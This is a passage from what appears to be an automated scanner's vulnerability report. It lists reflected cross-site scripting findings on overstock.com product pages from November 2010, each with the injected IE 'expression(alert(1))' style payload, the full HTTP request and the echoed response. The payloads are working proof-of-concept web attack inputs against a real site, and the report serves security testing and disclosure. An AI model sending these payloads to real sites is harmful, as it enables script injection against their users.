Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:43:38 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:43:38 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289407418846:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:38 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4600850|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:38 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=18
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Au
...[SNIP]...
<input type="hidden" name="2c3eb"style="x:expression(alert(1))"c04395c6a01" value="1"/>
...[SNIP]...

2.148. http://www.overstock.com/Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed627"style%3d"x%3aexpression(alert(1))"51cc8369783 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed627"style="x:expression(alert(1))"51cc8369783 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html?ed627"style%3d"x%3aexpression(alert(1))"51cc8369783=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:53:15 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:53:15 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407995447:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4757191|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:53:15 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:53:15 GMT; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Au
...[SNIP]...
<input type="hidden" name="ed627"style="x:expression(alert(1))"51cc8369783" value="1"/>
...[SNIP]...

2.149. http://www.overstock.com/Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd5f"style%3d"x%3aexpression(alert(1))"2eaac86dec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fd5f"style="x:expression(alert(1))"2eaac86dec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html?2fd5f"style%3d"x%3aexpression(alert(1))"2eaac86dec7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:32:02 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:32:02 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406722933:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3684083|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:02 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:02 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110399

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="2fd5f"style="x:expression(alert(1))"2eaac86dec7" value="1"/>
...[SNIP]...

2.150. http://www.overstock.com/Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4631e"style%3d"x%3aexpression(alert(1))"dddbfbee5a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4631e"style="x:expression(alert(1))"dddbfbee5a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html?4631e"style%3d"x%3aexpression(alert(1))"dddbfbee5a3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:42 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408081963:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3693416|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:42 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:42 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="4631e"style="x:expression(alert(1))"dddbfbee5a3" value="1"/>
...[SNIP]...

2.151. http://www.overstock.com/Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7960"style%3d"x%3aexpression(alert(1))"39eb48c4354 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7960"style="x:expression(alert(1))"39eb48c4354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html?d7960"style%3d"x%3aexpression(alert(1))"39eb48c4354=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:51:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:51:05 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:05 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5258414|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:05 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407865443:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="d7960"style="x:expression(alert(1))"39eb48c4354" value="1"/>
...[SNIP]...

2.152. http://www.overstock.com/Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d89d9"style%3d"x%3aexpression(alert(1))"5ef72601f3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d89d9"style="x:expression(alert(1))"5ef72601f3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html?d89d9"style%3d"x%3aexpression(alert(1))"5ef72601f3e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:24:12 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:24:12 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4039200|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:12 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406252460:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:12 GMT; Path=/
Keep-Alive: timeout=5, max=36
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112329

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="d89d9"style="x:expression(alert(1))"5ef72601f3e" value="1"/>
...[SNIP]...

2.153. http://www.overstock.com/Home-Garden/Bella-Chaise-Berry/4068267/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Berry/4068267/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1cb"style%3d"x%3aexpression(alert(1))"53fd88e1ab5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d1cb"style="x:expression(alert(1))"53fd88e1ab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Berry/4068267/product.html?3d1cb"style%3d"x%3aexpression(alert(1))"53fd88e1ab5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:21:12 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:21:13 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406072971:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068267|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:13 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:13 GMT; Path=/
Keep-Alive: timeout=5, max=25
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Be
...[SNIP]...
<input type="hidden" name="3d1cb"style="x:expression(alert(1))"53fd88e1ab5" value="1"/>
...[SNIP]...

2.154. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28664"style%3d"x%3aexpression(alert(1))"2a92a237479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28664"style="x:expression(alert(1))"2a92a237479 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?28664"style%3d"x%3aexpression(alert(1))"2a92a237479=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:20:47 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:20:47 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:47 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406047717:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:20:47 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
